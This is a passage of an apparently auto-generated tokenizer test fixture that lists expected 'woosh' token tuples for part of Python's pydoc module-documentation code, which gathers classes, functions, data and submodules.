woosh.Token(woosh.OP, '+', 1207, 70, 1207, 71),
woosh.Token(woosh.STRING, '"""\r\n\r\nThe following documentation is automatically generated from the Python\r\nsource files. It may be incomplete, incorrect or include features that\r\nare considered implementation detail and may vary between Python\r\nimplementations. When in doubt, consult the module reference at the\r\nlocation listed above.\r\n"""', 1207, 72, 1214, 3),
woosh.Token(woosh.OP, ')', 1214, 3, 1214, 4),
woosh.Token(woosh.NEWLINE, '\r\n', 1214, 4, 1215, 0),
woosh.Token(woosh.DEDENT, ' ', 1216, 0, 1216, 8),
woosh.Token(woosh.NAME, 'if', 1216, 8, 1216, 10),
woosh.Token(woosh.NAME, 'desc', 1216, 11, 1216, 15),
woosh.Token(woosh.OP, ':', 1216, 15, 1216, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1216, 16, 1217, 0),
woosh.Token(woosh.INDENT, ' ', 1217, 0, 1217, 12),
woosh.Token(woosh.NAME, 'result', 1217, 12, 1217, 18),
woosh.Token(woosh.OP, '=', 1217, 19, 1217, 20),
woosh.Token(woosh.NAME, 'result', 1217, 21, 1217, 27),
woosh.Token(woosh.OP, '+', 1217, 28, 1217, 29),
woosh.Token(woosh.NAME, 'self', 1217, 30, 1217, 34),
woosh.Token(woosh.OP, '.', 1217, 34, 1217, 35),
woosh.Token(woosh.NAME, 'section', 1217, 35, 1217, 42),
woosh.Token(woosh.OP, '(', 1217, 42, 1217, 43),
woosh.Token(woosh.STRING, "'DESCRIPTION'", 1217, 43, 1217, 56),
woosh.Token(woosh.OP, ',', 1217, 56, 1217, 57),
woosh.Token(woosh.NAME, 'desc', 1217, 58, 1217, 62),
woosh.Token(woosh.OP, ')', 1217, 62, 1217, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 1217, 63, 1218, 0),
woosh.Token(woosh.DEDENT, ' ', 1219, 0, 1219, 8),
woosh.Token(woosh.NAME, 'classes', 1219, 8, 1219, 15),
woosh.Token(woosh.OP, '=', 1219, 16, 1219, 17),
woosh.Token(woosh.OP, '[', 1219, 18, 1219, 19),
woosh.Token(woosh.OP, ']', 1219, 19, 1219, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1219, 20, 1220, 0),
woosh.Token(woosh.NAME, 'for', 1220, 8, 1220, 11),
woosh.Token(woosh.NAME, 'key', 1220, 12, 1220, 15),
woosh.Token(woosh.OP, ',', 1220, 15, 1220, 16),
woosh.Token(woosh.NAME, 'value', 1220, 17, 1220, 22),
woosh.Token(woosh.NAME, 'in', 1220, 23, 1220, 25),
woosh.Token(woosh.NAME, 'inspect', 1220, 26, 1220, 33),
woosh.Token(woosh.OP, '.', 1220, 33, 1220, 34),
woosh.Token(woosh.NAME, 'getmembers', 1220, 34, 1220, 44),
woosh.Token(woosh.OP, '(', 1220, 44, 1220, 45),
woosh.Token(woosh.NAME, 'object', 1220, 45, 1220, 51),
woosh.Token(woosh.OP, ',', 1220, 51, 1220, 52),
woosh.Token(woosh.NAME, 'inspect', 1220, 53, 1220, 60),
woosh.Token(woosh.OP, '.', 1220, 60, 1220, 61),
woosh.Token(woosh.NAME, 'isclass', 1220, 61, 1220, 68),
woosh.Token(woosh.OP, ')', 1220, 68, 1220, 69),
woosh.Token(woosh.OP, ':', 1220, 69, 1220, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 1220, 70, 1221, 0),
woosh.Token(woosh.COMMENT, '# if __all__ exists, believe it. Otherwise use old heuristic.', 1221, 12, 1221, 74),
woosh.Token(woosh.INDENT, ' ', 1222, 0, 1222, 12),
woosh.Token(woosh.NAME, 'if', 1222, 12, 1222, 14),
woosh.Token(woosh.OP, '(', 1222, 15, 1222, 16),
woosh.Token(woosh.NAME, 'all', 1222, 16, 1222, 19),
woosh.Token(woosh.NAME, 'is', 1222, 20, 1222, 22),
woosh.Token(woosh.NAME, 'not', 1222, 23, 1222, 26),
woosh.Token(woosh.NAME, 'None', 1222, 27, 1222, 31),
woosh.Token(woosh.NAME, 'or', 1223, 16, 1223, 18),
woosh.Token(woosh.OP, '(', 1223, 19, 1223, 20),
woosh.Token(woosh.NAME, 'inspect', 1223, 20, 1223, 27),
woosh.Token(woosh.OP, '.', 1223, 27, 1223, 28),
woosh.Token(woosh.NAME, 'getmodule', 1223, 28, 1223, 37),
woosh.Token(woosh.OP, '(', 1223, 37, 1223, 38),
woosh.Token(woosh.NAME, 'value', 1223, 38, 1223, 43),
woosh.Token(woosh.OP, ')', 1223, 43, 1223, 44),
woosh.Token(woosh.NAME, 'or', 1223, 45, 1223, 47),
woosh.Token(woosh.NAME, 'object', 1223, 48, 1223, 54),
woosh.Token(woosh.OP, ')', 1223, 54, 1223, 55),
woosh.Token(woosh.NAME, 'is', 1223, 56, 1223, 58),
woosh.Token(woosh.NAME, 'object', 1223, 59, 1223, 65),
woosh.Token(woosh.OP, ')', 1223, 65, 1223, 66),
woosh.Token(woosh.OP, ':', 1223, 66, 1223, 67),
woosh.Token(woosh.NEWLINE, '\r\n', 1223, 67, 1224, 0),
woosh.Token(woosh.INDENT, ' ', 1224, 0, 1224, 16),
woosh.Token(woosh.NAME, 'if', 1224, 16, 1224, 18),
woosh.Token(woosh.NAME, 'visiblename', 1224, 19, 1224, 30),
woosh.Token(woosh.OP, '(', 1224, 30, 1224, 31),
woosh.Token(woosh.NAME, 'key', 1224, 31, 1224, 34),
woosh.Token(woosh.OP, ',', 1224, 34, 1224, 35),
woosh.Token(woosh.NAME, 'all', 1224, 36, 1224, 39),
woosh.Token(woosh.OP, ',', 1224, 39, 1224, 40),
woosh.Token(woosh.NAME, 'object', 1224, 41, 1224, 47),
woosh.Token(woosh.OP, ')', 1224, 47, 1224, 48),
woosh.Token(woosh.OP, ':', 1224, 48, 1224, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 1224, 49, 1225, 0),
woosh.Token(woosh.INDENT, ' ', 1225, 0, 1225, 20),
woosh.Token(woosh.NAME, 'classes', 1225, 20, 1225, 27),
woosh.Token(woosh.OP, '.', 1225, 27, 1225, 28),
woosh.Token(woosh.NAME, 'append', 1225, 28, 1225, 34),
woosh.Token(woosh.OP, '(', 1225, 34, 1225, 35),
woosh.Token(woosh.OP, '(', 1225, 35, 1225, 36),
woosh.Token(woosh.NAME, 'key', 1225, 36, 1225, 39),
woosh.Token(woosh.OP, ',', 1225, 39, 1225, 40),
woosh.Token(woosh.NAME, 'value', 1225, 41, 1225, 46),
woosh.Token(woosh.OP, ')', 1225, 46, 1225, 47),
woosh.Token(woosh.OP, ')', 1225, 47, 1225, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 1225, 48, 1226, 0),
woosh.Token(woosh.DEDENT, ' ', 1226, 0, 1226, 8),
woosh.Token(woosh.DEDENT, '', 1226, 8, 1226, 8),
woosh.Token(woosh.DEDENT, '', 1226, 8, 1226, 8),
woosh.Token(woosh.NAME, 'funcs', 1226, 8, 1226, 13),
woosh.Token(woosh.OP, '=', 1226, 14, 1226, 15),
woosh.Token(woosh.OP, '[', 1226, 16, 1226, 17),
woosh.Token(woosh.OP, ']', 1226, 17, 1226, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1226, 18, 1227, 0),
woosh.Token(woosh.NAME, 'for', 1227, 8, 1227, 11),
woosh.Token(woosh.NAME, 'key', 1227, 12, 1227, 15),
woosh.Token(woosh.OP, ',', 1227, 15, 1227, 16),
woosh.Token(woosh.NAME, 'value', 1227, 17, 1227, 22),
woosh.Token(woosh.NAME, 'in', 1227, 23, 1227, 25),
woosh.Token(woosh.NAME, 'inspect', 1227, 26, 1227, 33),
woosh.Token(woosh.OP, '.', 1227, 33, 1227, 34),
woosh.Token(woosh.NAME, 'getmembers', 1227, 34, 1227, 44),
woosh.Token(woosh.OP, '(', 1227, 44, 1227, 45),
woosh.Token(woosh.NAME, 'object', 1227, 45, 1227, 51),
woosh.Token(woosh.OP, ',', 1227, 51, 1227, 52),
woosh.Token(woosh.NAME, 'inspect', 1227, 53, 1227, 60),
woosh.Token(woosh.OP, '.', 1227, 60, 1227, 61),
woosh.Token(woosh.NAME, 'isroutine', 1227, 61, 1227, 70),
woosh.Token(woosh.OP, ')', 1227, 70, 1227, 71),
woosh.Token(woosh.OP, ':', 1227, 71, 1227, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 1227, 72, 1228, 0),
woosh.Token(woosh.COMMENT, '# if __all__ exists, believe it. Otherwise use old heuristic.', 1228, 12, 1228, 74),
woosh.Token(woosh.INDENT, ' ', 1229, 0, 1229, 12),
woosh.Token(woosh.NAME, 'if', 1229, 12, 1229, 14),
woosh.Token(woosh.OP, '(', 1229, 15, 1229, 16),
woosh.Token(woosh.NAME, 'all', 1229, 16, 1229, 19),
woosh.Token(woosh.NAME, 'is', 1229, 20, 1229, 22),
woosh.Token(woosh.NAME, 'not', 1229, 23, 1229, 26),
woosh.Token(woosh.NAME, 'None', 1229, 27, 1229, 31),
woosh.Token(woosh.NAME, 'or', 1229, 32, 1229, 34),
woosh.Token(woosh.NAME, 'inspect', 1230, 16, 1230, 23),
woosh.Token(woosh.OP, '.', 1230, 23, 1230, 24),
woosh.Token(woosh.NAME, 'isbuiltin', 1230, 24, 1230, 33),
woosh.Token(woosh.OP, '(', 1230, 33, 1230, 34),
woosh.Token(woosh.NAME, 'value', 1230, 34, 1230, 39),
woosh.Token(woosh.OP, ')', 1230, 39, 1230, 40),
woosh.Token(woosh.NAME, 'or', 1230, 41, 1230, 43),
woosh.Token(woosh.NAME, 'inspect', 1230, 44, 1230, 51),
woosh.Token(woosh.OP, '.', 1230, 51, 1230, 52),
woosh.Token(woosh.NAME, 'getmodule', 1230, 52, 1230, 61),
woosh.Token(woosh.OP, '(', 1230, 61, 1230, 62),
woosh.Token(woosh.NAME, 'value', 1230, 62, 1230, 67),
woosh.Token(woosh.OP, ')', 1230, 67, 1230, 68),
woosh.Token(woosh.NAME, 'is', 1230, 69, 1230, 71),
woosh.Token(woosh.NAME, 'object', 1230, 72, 1230, 78),
woosh.Token(woosh.OP, ')', 1230, 78, 1230, 79),
woosh.Token(woosh.OP, ':', 1230, 79, 1230, 80),
woosh.Token(woosh.NEWLINE, '\r\n', 1230, 80, 1231, 0),
woosh.Token(woosh.INDENT, ' ', 1231, 0, 1231, 16),
woosh.Token(woosh.NAME, 'if', 1231, 16, 1231, 18),
woosh.Token(woosh.NAME, 'visiblename', 1231, 19, 1231, 30),
woosh.Token(woosh.OP, '(', 1231, 30, 1231, 31),
woosh.Token(woosh.NAME, 'key', 1231, 31, 1231, 34),
woosh.Token(woosh.OP, ',', 1231, 34, 1231, 35),
woosh.Token(woosh.NAME, 'all', 1231, 36, 1231, 39),
woosh.Token(woosh.OP, ',', 1231, 39, 1231, 40),
woosh.Token(woosh.NAME, 'object', 1231, 41, 1231, 47),
woosh.Token(woosh.OP, ')', 1231, 47, 1231, 48),
woosh.Token(woosh.OP, ':', 1231, 48, 1231, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 1231, 49, 1232, 0),
woosh.Token(woosh.INDENT, ' ', 1232, 0, 1232, 20),
woosh.Token(woosh.NAME, 'funcs', 1232, 20, 1232, 25),
woosh.Token(woosh.OP, '.', 1232, 25, 1232, 26),
woosh.Token(woosh.NAME, 'append', 1232, 26, 1232, 32),
woosh.Token(woosh.OP, '(', 1232, 32, 1232, 33),
woosh.Token(woosh.OP, '(', 1232, 33, 1232, 34),
woosh.Token(woosh.NAME, 'key', 1232, 34, 1232, 37),
woosh.Token(woosh.OP, ',', 1232, 37, 1232, 38),
woosh.Token(woosh.NAME, 'value', 1232, 39, 1232, 44),
woosh.Token(woosh.OP, ')', 1232, 44, 1232, 45),
woosh.Token(woosh.OP, ')', 1232, 45, 1232, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 1232, 46, 1233, 0),
woosh.Token(woosh.DEDENT, ' ', 1233, 0, 1233, 8),
woosh.Token(woosh.DEDENT, '', 1233, 8, 1233, 8),
woosh.Token(woosh.DEDENT, '', 1233, 8, 1233, 8),
woosh.Token(woosh.NAME, 'data', 1233, 8, 1233, 12),
woosh.Token(woosh.OP, '=', 1233, 13, 1233, 14),
woosh.Token(woosh.OP, '[', 1233, 15, 1233, 16),
woosh.Token(woosh.OP, ']', 1233, 16, 1233, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1233, 17, 1234, 0),
woosh.Token(woosh.NAME, 'for', 1234, 8, 1234, 11),
woosh.Token(woosh.NAME, 'key', 1234, 12, 1234, 15),
woosh.Token(woosh.OP, ',', 1234, 15, 1234, 16),
woosh.Token(woosh.NAME, 'value', 1234, 17, 1234, 22),
woosh.Token(woosh.NAME, 'in', 1234, 23, 1234, 25),
woosh.Token(woosh.NAME, 'inspect', 1234, 26, 1234, 33),
woosh.Token(woosh.OP, '.', 1234, 33, 1234, 34),
woosh.Token(woosh.NAME, 'getmembers', 1234, 34, 1234, 44),
woosh.Token(woosh.OP, '(', 1234, 44, 1234, 45),
woosh.Token(woosh.NAME, 'object', 1234, 45, 1234, 51),
woosh.Token(woosh.OP, ',', 1234, 51, 1234, 52),
woosh.Token(woosh.NAME, 'isdata', 1234, 53, 1234, 59),
woosh.Token(woosh.OP, ')', 1234, 59, 1234, 60),
woosh.Token(woosh.OP, ':', 1234, 60, 1234, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 1234, 61, 1235, 0),
woosh.Token(woosh.INDENT, ' ', 1235, 0, 1235, 12),
woosh.Token(woosh.NAME, 'if', 1235, 12, 1235, 14),
woosh.Token(woosh.NAME, 'visiblename', 1235, 15, 1235, 26),
woosh.Token(woosh.OP, '(', 1235, 26, 1235, 27),
woosh.Token(woosh.NAME, 'key', 1235, 27, 1235, 30),
woosh.Token(woosh.OP, ',', 1235, 30, 1235, 31),
woosh.Token(woosh.NAME, 'all', 1235, 32, 1235, 35),
woosh.Token(woosh.OP, ',', 1235, 35, 1235, 36),
woosh.Token(woosh.NAME, 'object', 1235, 37, 1235, 43),
woosh.Token(woosh.OP, ')', 1235, 43, 1235, 44),
woosh.Token(woosh.OP, ':', 1235, 44, 1235, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 1235, 45, 1236, 0),
woosh.Token(woosh.INDENT, ' ', 1236, 0, 1236, 16),
woosh.Token(woosh.NAME, 'data', 1236, 16, 1236, 20),
woosh.Token(woosh.OP, '.', 1236, 20, 1236, 21),
woosh.Token(woosh.NAME, 'append', 1236, 21, 1236, 27),
woosh.Token(woosh.OP, '(', 1236, 27, 1236, 28),
woosh.Token(woosh.OP, '(', 1236, 28, 1236, 29),
woosh.Token(woosh.NAME, 'key', 1236, 29, 1236, 32),
woosh.Token(woosh.OP, ',', 1236, 32, 1236, 33),
woosh.Token(woosh.NAME, 'value', 1236, 34, 1236, 39),
woosh.Token(woosh.OP, ')', 1236, 39, 1236, 40),
woosh.Token(woosh.OP, ')', 1236, 40, 1236, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1236, 41, 1237, 0),
woosh.Token(woosh.DEDENT, ' ', 1238, 0, 1238, 8),
woosh.Token(woosh.DEDENT, '', 1238, 8, 1238, 8),
woosh.Token(woosh.NAME, 'modpkgs', 1238, 8, 1238, 15),
woosh.Token(woosh.OP, '=', 1238, 16, 1238, 17),
woosh.Token(woosh.OP, '[', 1238, 18, 1238, 19),
woosh.Token(woosh.OP, ']', 1238, 19, 1238, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1238, 20, 1239, 0),
woosh.Token(woosh.NAME, 'modpkgs_names', 1239, 8, 1239, 21),
woosh.Token(woosh.OP, '=', 1239, 22, 1239, 23),
woosh.Token(woosh.NAME, 'set', 1239, 24, 1239, 27),
woosh.Token(woosh.OP, '(', 1239, 27, 1239, 28),
woosh.Token(woosh.OP, ')', 1239, 28, 1239, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1239, 29, 1240, 0),
woosh.Token(woosh.NAME, 'if', 1240, 8, 1240, 10),
woosh.Token(woosh.NAME, 'hasattr', 1240, 11, 1240, 18),
woosh.Token(woosh.OP, '(', 1240, 18, 1240, 19),
woosh.Token(woosh.NAME, 'object', 1240, 19, 1240, 25),
woosh.Token(woosh.OP, ',', 1240, 25, 1240, 26),
woosh.Token(woosh.STRING, "'__path__'", 1240, 27, 1240, 37),
woosh.Token(woosh.OP, ')', 1240, 37, 1240, 38),
woosh.Token(woosh.OP, ':', 1240, 38, 1240, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1240, 39, 1241, 0),
woosh.Token(woosh.INDENT, ' ', 1241, 0, 1241, 12),
woosh.Token(woosh.NAME, 'for', 1241, 12, 1241, 15),
woosh.Token(woosh.NAME, 'importer', 1241, 16, 1241, 24),
woosh.Token(woosh.OP, ',', 1241, 24, 1241, 25),
woosh.Token(woosh.NAME, 'modname', 1241, 26, 1241, 33),
woosh.Token(woosh.OP, ',', 1241, 33, 1241, 34),
woosh.Token(woosh.NAME, 'ispkg', 1241, 35, 1241, 40),
woosh.Token(woosh.NAME, 'in', 1241, 41, 1241, 43),
woosh.Token(woosh.NAME, 'pkgutil', 1241, 44, 1241, 51),
woosh.Token(woosh.OP, '.', 1241, 51, 1241, 52),
woosh.Token(woosh.NAME, 'iter_modules', 1241, 52, 1241, 64),
woosh.Token(woosh.OP, '(', 1241, 64, 1241, 65),
woosh.Token(woosh.NAME, 'object', 1241, 65, 1241, 71),
woosh.Token(woosh.OP, '.', 1241, 71, 1241, 72),
woosh.Token(woosh.NAME, '__path__', 1241, 72, 1241, 80),
woosh.Token(woosh.OP, ')', 1241, 80, 1241, 81),
woosh.Token(woosh.OP, ':', 1241, 81, 1241, 82),
woosh.Token(woosh.NEWLINE, '\r\n', 1241, 82, 1242, 0),
woosh.Token(woosh.INDENT, ' ', 1242, 0, 1242, 16),
woosh.Token(woosh.NAME, 'modpkgs_names', 1242, 16, 1242, 29),
woosh.Token(woosh.OP, '.', 1242, 29, 1242, 30),
woosh.Token(woosh.NAME, 'add', 1242, 30, 1242, 33),
woosh.Token(woosh.OP, '(', 1242, 33, 1242, 34),
woosh.Token(woosh.NAME, 'modname', 1242, 34, 1242, 41),
woosh.Token(woosh.OP, ')', 1242, 41, 1242, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1242, 42, 1243, 0),
woosh.Token(woosh.NAME, 'if', 1243, 16, 1243, 18),
woosh.Token(woosh.NAME, 'ispkg', 1243, 19, 1243, 24),
woosh.Token(woosh.OP, ':', 1243, 24, 1243, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1243, 25, 1244, 0),
woosh.Token(woosh.INDENT, ' ', 1244, 0, 1244, 20),
woosh.Token(woosh.NAME, 'modpkgs', 1244, 20, 1244, 27),
woosh.Token(woosh.OP, '.', 1244, 27, 1244, 28),
woosh.Token(woosh.NAME, 'append', 1244, 28, 1244, 34),
woosh.Token(woosh.OP, '(', 1244, 34, 1244, 35),
woosh.Token(woosh.NAME, 'modname', 1244, 35, 1244, 42),
woosh.Token(woosh.OP, '+', 1244, 43, 1244, 44),
woosh.Token(woosh.STRING, "' (package)'", 1244, 45, 1244, 57),
woosh.Token(woosh.OP, ')', 1244, 57, 1244, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 1244, 58, 1245, 0),
woosh.Token(woosh.DEDENT, ' ', 1245, 0, 1245, 16),
woosh.Token(woosh.NAME, 'else', 1245, 16, 1245, 20),
woosh.Token(woosh.OP, ':', 1245, 20, 1245, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1245, 21, 1246, 0),
woosh.Token(woosh.INDENT, ' ', 1246, 0, 1246, 20),
woosh.Token(woosh.NAME, 'modpkgs', 1246, 20, 1246, 27),
woosh.Token(woosh.OP, '.', 1246, 27, 1246, 28),
woosh.Token(woosh.NAME, 'append', 1246, 28, 1246, 34),
woosh.Token(woosh.OP, '(', 1246, 34, 1246, 35),
woosh.Token(woosh.NAME, 'modname', 1246, 35, 1246, 42),
woosh.Token(woosh.OP, ')', 1246, 42, 1246, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 1246, 43, 1247, 0),
woosh.Token(woosh.DEDENT, ' ', 1248, 0, 1248, 12),
woosh.Token(woosh.DEDENT, '', 1248, 12, 1248, 12),
woosh.Token(woosh.NAME, 'modpkgs', 1248, 12, 1248, 19),
woosh.Token(woosh.OP, '.', 1248, 19, 1248, 20),
woosh.Token(woosh.NAME, 'sort', 1248, 20, 1248, 24),
woosh.Token(woosh.OP, '(', 1248, 24, 1248, 25),
woosh.Token(woosh.OP, ')', 1248, 25, 1248, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 1248, 26, 1249, 0),
woosh.Token(woosh.NAME, 'result', 1249, 12, 1249, 18),
woosh.Token(woosh.OP, '=', 1249, 19, 1249, 20),
woosh.Token(woosh.NAME, 'result', 1249, 21, 1249, 27),
woosh.Token(woosh.OP, '+', 1249, 28, 1249, 29),
woosh.Token(woosh.NAME, 'self', 1249, 30, 1249, 34),
woosh.Token(woosh.OP, '.', 1249, 34, 1249, 35),
woosh.Token(woosh.NAME, 'section', 1249, 35, 1249, 42),
woosh.Token(woosh.OP, '(', 1249, 42, 1249, 43),
woosh.Token(woosh.STRING, "'PACKAGE CONTENTS'", 1250, 16, 1250, 34),
woosh.Token(woosh.OP, ',', 1250, 34, 1250, 35),
woosh.Token(woosh.STRING, "'\\n'", 1250, 36, 1250, 40),
woosh.Token(woosh.OP, '.', 1250, 40, 1250, 41),
woosh.Token(woosh.NAME, 'join', 1250, 41, 1250, 45),
woosh.Token(woosh.OP, '(', 1250, 45, 1250, 46),
woosh.Token(woosh.NAME, 'modpkgs', 1250, 46, 1250, 53),
woosh.Token(woosh.OP, ')', 1250, 53, 1250, 54),
woosh.Token(woosh.OP, ')', 1250, 54, 1250, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1250, 55, 1251, 0),
woosh.Token(woosh.COMMENT, '# Detect submodules as sometimes created by C extensions', 1252, 8, 1252, 64),
woosh.Token(woosh.DEDENT, ' ', 1253, 0, 1253, 8),
woosh.Token(woosh.NAME, 'submodules', 1253, 8, 1253, 18),
woosh.Token(woosh.OP, '=', 1253, 19, 1253, 20),
woosh.Token(woosh.OP, '[', 1253, 21, 1253, 22),
woosh.Token(woosh.OP, ']', 1253, 22, 1253, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1253, 23, 1254, 0),
woosh.Token(woosh.NAME, 'for', 1254, 8, 1254, 11),
woosh.Token(woosh.NAME, 'key', 1254, 12, 1254, 15),
woosh.Token(woosh.OP, ',', 1254, 15, 1254, 16),
woosh.Token(woosh.NAME, 'value', 1254, 17, 1254, 22),
woosh.Token(woosh.NAME, 'in', 1254, 23, 1254, 25),
woosh.Token(woosh.NAME, 'inspect', 1254, 26, 1254, 33),
woosh.Token(woosh.OP, '.', 1254, 33, 1254, 34),
woosh.Token(woosh.NAME, 'getmembers', 1254, 34, 1254, 44),
woosh.Token(woosh.OP, '(', 1254, 44, 1254, 45),
woosh.Token(woosh.NAME, 'object', 1254, 45, 1254, 51),
woosh.Token(woosh.OP, ',', 1254, 51, 1254, 52),
woosh.Token(woosh.NAME, 'inspect', 1254, 53, 1254, 60),
woosh.Token(woosh.OP, '.', 1254, 60, 1254, 61),
woosh.Token(woosh.NAME, 'ismodule', 1254, 61, 1254, 69),
woosh.Token(woosh.OP, ')', 1254, 69, 1254, 70),
woosh.Token(woosh.OP, ':', 1254, 70, 1254, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 1254, 71, 1255, 0),
woosh.Token(woosh.INDENT, ' ', 1255, 0, 1255, 12),
woosh.Token(woosh.NAME, 'if', 1255, 12, 1255, 14),
woosh.Token(woosh.NAME, 'value', 1255, 15, 1255, 20),
woosh.Token(woosh.OP, '.', 1255, 20, 1255, 21),
woosh.Token(woosh.NAME, '__name__', 1255, 21, 1255, 29),
woosh.Token(woosh.OP, '.', 1255, 29, 1255, 30),
woosh.Token(woosh.NAME, 'startswith', 1255, 30, 1255, 40),
woosh.Token(woosh.OP, '(', 1255, 40, 1255, 41),
woosh.Token(woosh.NAME, 'name', 1255, 41, 1255, 45),
woosh.Token(woosh.OP, '+', 1255, 46, 1255, 47),
woosh.Token(woosh.STRING, "'.'", 1255, 48, 1255, 51),
woosh.Token(woosh.OP, ')', 1255, 51, 1255, 52),
woosh.Token(woosh.NAME, 'and', 1255, 53, 1255, 56),
woosh.Token(woosh.NAME, 'key', 1255, 57, 1255, 60),
woosh.Token(woosh.NAME, 'not', 1255, 61, 1255, 64),
woosh.Token(woosh.NAME, 'in', 1255, 65, 1255, 67),
woosh.Token(woosh.NAME, 'modpkgs_names', 1255, 68, 1255, 81),
woosh.Token(woosh.OP, ':', 1255, 81, 1255, 82),
woosh.Token(woosh.NEWLINE, '\r\n', 1255, 82, 1256, 0),
woosh.Token(woosh.INDENT, ' ', 1256, 0, 1256, 16),
woosh.Token(woosh.NAME, 'submodules', 1256, 16, 1256, 26),
woosh.Token(woosh.OP, '.', 1256, 26, 1256, 27),
woosh.Token(woosh.NAME, 'append', 1256, 27, 1256, 33),
woosh.Token(woosh.OP, '(', 1256, 33, 1256, 34),
woosh.Token(woosh.NAME, 'key', 1256, 34, 1256, 37),
woosh.Token(woosh.OP, ')', 1256, 37, 1256, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1256, 38, 1257, 0),
woosh.Token(woosh.DEDENT, ' ', 1257, 0, 1257, 8),
woosh.Token(woosh.DEDENT, '', 1257, 8, 1257, 8),
woosh.Token(woosh.NAME, 'if', 1257, 8, 1257, 10),
woosh.Token(woosh.NAME, 'submodules', 1257, 11, 1257, 21),
woosh.Token(woosh.OP, ':', 1257, 21, 1257, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 1257, 22, 1258, 0),
woosh.Token(woosh.INDENT, ' ', 1258, 0, 1258, 12),
woosh.Token(woosh.NAME, 'submodules', 1258, 12, 1258, 22),
woosh.Token(woosh.OP, '.', 1258, 22, 1258, 23),
woosh.Token(woosh.NAME, 'sort', 1258, 23, 1258, 27),
woosh.Token(woosh.OP, '(', 1258, 27, 1258, 28),
woosh.Token(woosh.OP, ')', 1258, 28, 1258, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1258, 29, 1259, 0),
woosh.Token(woosh.NAME, 'result', 1259, 12, 1259, 18),
woosh.Token(woosh.OP, '=', 1259, 19, 1259, 20),
woosh.Token(woosh.NAME, 'result', 1259, 21, 1259, 27),
woosh.Token(woosh.OP, '+', 1259, 28, 1259, 29),
woosh.Token(woosh.NAME, 'self', 1259, 30, 1259, 34),
woosh.Token(woosh.OP, '.', 1259, 34, 1259, 35),
woosh.Token(woosh.NAME, 'section', 1259, 35, 1259, 42),
woosh.Token(woosh.OP, '(', 1259, 42, 1259, 43),
woosh.Token(woosh.STRING, "'SUBMODULES'", 1260, 16, 1260, 28),
woosh.Token(woosh.OP, ',', 1260, 28, 1260, 29),
woosh.Token(woosh.STRING, "'\\n'", 1260, 30, 1260, 34),
woosh.Token(woosh.OP, '.', 1260, 34, 1260, 35),
woosh.Token(woosh.NAME, 'join', 1260, 35, 1260, 39),
woosh.Token(woosh.OP, '(', 1260, 39, 1260, 40),
woosh.Token(woosh.NAME, 'submodules', 1260, 40, 1260, 50),
woosh.Token(woosh.OP, ')', 1260, 50, 1260, 51),
woosh.Token(woosh.OP, ')', 1260, 51, 1260, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1260, 52, 1261, 0),
woosh.Token(woosh.DEDENT, ' ', 1262, 0, 1262, 8),
woosh.Token(woosh.NAME, 'if', 1262, 8, 1262, 10),
woosh.Token(woosh.NAME, 'classes', 1262, 11, 1262, 18),
woosh.Token(woosh.OP, ':', 1262, 18, 1262, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1262, 19, 1263, 0),
woosh.Token(woosh.INDENT, ' ', 1263, 0, 1263, 12),
woosh.Token(woosh.NAME, 'classlist', 1263, 12, 1263, 21),
woosh.Token(woosh.OP, '=', 1263, 22, 1263, 23),
woosh.Token(woosh.OP, '[', 1263, 24, 1263, 25),
woosh.Token(woosh.NAME, 'value', 1263, 25, 1263, 30),
woosh.Token(woosh.NAME, 'for', 1263, 31, 1263, 34),
woosh.Token(woosh.NAME, 'key', 1263, 35, 1263, 38),
woosh.Token(woosh.OP, ',', 1263, 38, 1263, 39),
woosh.Token(woosh.NAME, 'value', 1263, 40, 1263, 45),
woosh.Token(woosh.NAME, 'in', 1263, 46, 1263, 48),
woosh.Token(woosh.NAME, 'classes', 1263, 49, 1263, 56),
woosh.Token(woosh.OP, ']', 1263, 56, 1263, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 1263, 57, 1264, 0),
woosh.Token(woosh.NAME, 'contents', 1264, 12, 1264, 20),
woosh.Token(woosh.OP, '=', 1264, 21, 1264, 22),
woosh.Token(woosh.OP, '[', 1264, 23, 1264, 24),
woosh.Token(woosh.NAME, 'self', 1264, 24, 1264, 28),
woosh.Token(woosh.OP, '.', 1264, 28, 1264, 29),
woosh.Token(woosh.NAME, 'formattree', 1264, 29, 1264, 39),
woosh.Token(woosh.OP, '(', 1264, 39, 1264, 40),
woosh.Token(woosh.NAME, 'inspect', 1265, 16, 1265, 23),
woosh.Token(woosh.OP, '.', 1265, 23, 1265, 24),
woosh.Token(woosh.NAME, 'getclasstree', 1265, 24, 1265, 36),
woosh.Token(woosh.OP, '(', 1265, 36, 1265, 37),
woosh.Token(woosh.NAME, 'classlist', 1265, 37, 1265, 46),
woosh.Token(woosh.OP, ',', 1265, 46, 1265, 47),
woosh.Token(woosh.NUMBER, '1', 1265, 48, 1265, 49),
woosh.Token(woosh.OP, ')', 1265, 49, 1265, 50),
woosh.Token(woosh.OP, ',', 1265, 50, 1265, 51),
